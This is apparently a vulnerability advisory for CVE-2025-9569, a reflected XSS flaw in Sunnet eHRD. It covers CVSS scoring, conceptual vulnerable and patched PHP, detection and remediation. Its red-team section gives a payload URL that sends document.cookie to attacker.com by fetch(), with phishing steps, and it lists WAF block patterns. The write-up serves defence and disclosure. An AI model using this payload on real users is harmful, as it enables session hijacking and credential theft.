CVE-2025-9569
Executive Summary
CVE-2025-9569 is a Reflected Cross-Site Scripting (XSS) vulnerability in the eHRD application developed by Sunnet. This flaw allows an unauthenticated, remote attacker to inject arbitrary JavaScript code into a user's browser session via a crafted URL. The attack vector relies on social engineering (phishing) to trick a victim into clicking a malicious link. Successful exploitation can lead to session hijacking, credential theft, or defacement within the context of the vulnerable eHRD application. No public proof-of-concept (PoC) code or patch is currently available.

CVSS Breakdown & Threat Level
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- Base Score: 6.1 (Medium)
- Attack Vector (AV): Network (N) – Exploitable remotely.
- Attack Complexity (AC): Low (L) – No special conditions required.
- Privileges Required (PR): None (N) – No authentication needed.
- User Interaction (UI): Required (R) – Victim must click a link.
- Scope (S): Changed (C) – Impact extends beyond the vulnerable component.
- Confidentiality (C): Low (L) – Limited data exposure.
- Integrity (I): Low (L) – Limited data modification.
- Availability (A): None (N) – No impact on availability.
Threat Level: Medium. While the CVSS score is moderate, the lack of a patch and the ease of exploitation via phishing make this a significant risk for organizations using Sunnet eHRD.
Deep Dive & Mechanics
The vulnerability is a classic Reflected XSS. The eHRD application fails to properly sanitize user-supplied input before reflecting it in the HTTP response. An attacker can craft a URL containing malicious JavaScript code in a query parameter (e.g., ?search=<script>alert('XSS')</script>). When the victim clicks this link, the browser sends the request to the eHRD server, which then includes the unsanitized script in the response page. The browser executes the script in the context of the eHRD domain, allowing the attacker to:
- Steal session cookies (
document.cookie). - Perform actions on behalf of the victim (e.g., modify HR records).
- Redirect the user to a phishing site.
- Capture keystrokes or form data.
The attack does not require authentication, making it accessible to any remote attacker. The primary mitigation is input validation and output encoding, which Sunnet has not implemented.
Vulnerable vs. Patched Code
Since no patch is available, the vulnerable code is presumed to be present in all versions of Sunnet eHRD. A patched version would implement proper output encoding.
Vulnerable Code (Conceptual):
// Vulnerable: Directly echoes user input without sanitization
$search = $_GET['search'];
echo "<div>Search results for: " . $search . "</div>";
Patched Code (Conceptual):
// Patched: Uses htmlspecialchars to encode HTML entities
$search = $_GET['search'];
echo "<div>Search results for: " . htmlspecialchars($search, ENT_QUOTES, 'UTF-8') . "</div>";
Exploitation & Lab Setup
Red Team (Attack Simulation)
- Setup: Deploy a local instance of Sunnet eHRD (if available) or use a test environment.
- Craft Payload: Create a URL with a malicious script. Example:
http://target-ehrd.com/search.php?search=<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> - Phishing: Send the crafted URL to a victim via email or social engineering.
- Execution: When the victim clicks the link, the script executes, sending their session cookie to the attacker's server.
Note: No public exploit code is available. The above is a conceptual example.
Blue Team (Defense & Detection)
- Web Application Firewall (WAF): Deploy WAF rules to block common XSS patterns (e.g.,
<script>,onerror=,javascript:). - Input Validation: Implement server-side validation to reject or sanitize input containing HTML/JavaScript.
- Content Security Policy (CSP): Set a strict CSP header to block inline scripts and restrict script sources.
- User Education: Train users to recognize phishing attempts and avoid clicking suspicious links.
Indicators of Compromise (IOCs)
- Network IOCs:
- HTTP requests containing
<script>tags in query parameters (e.g.,?search=<script>). - Outbound connections to unknown or suspicious domains from the eHRD server.
- HTTP requests containing
- Host IOCs:
- Unexpected JavaScript execution in the browser when visiting eHRD pages.
- Modified or missing session cookies after clicking a link.
- Log IOCs:
- Web server logs showing requests with encoded or raw XSS payloads in parameters.
- Browser console errors related to CSP violations.

Remediation & Mitigation
Immediate Actions:
- Apply a virtual patch via WAF to block XSS payloads.
- Restrict access to the eHRD application to trusted networks only.
- Monitor logs for suspicious activity.
Long-Term Fix:
- Contact Sunnet for an official patch.
- Implement proper input validation and output encoding in the application code.
- Conduct a security audit of the entire eHRD application.
Compensating Controls:
- Enforce Content Security Policy (CSP) headers.
- Use HTTP-only and Secure flags for cookies.
- Deploy a Web Application Firewall (WAF) with XSS protection rules.
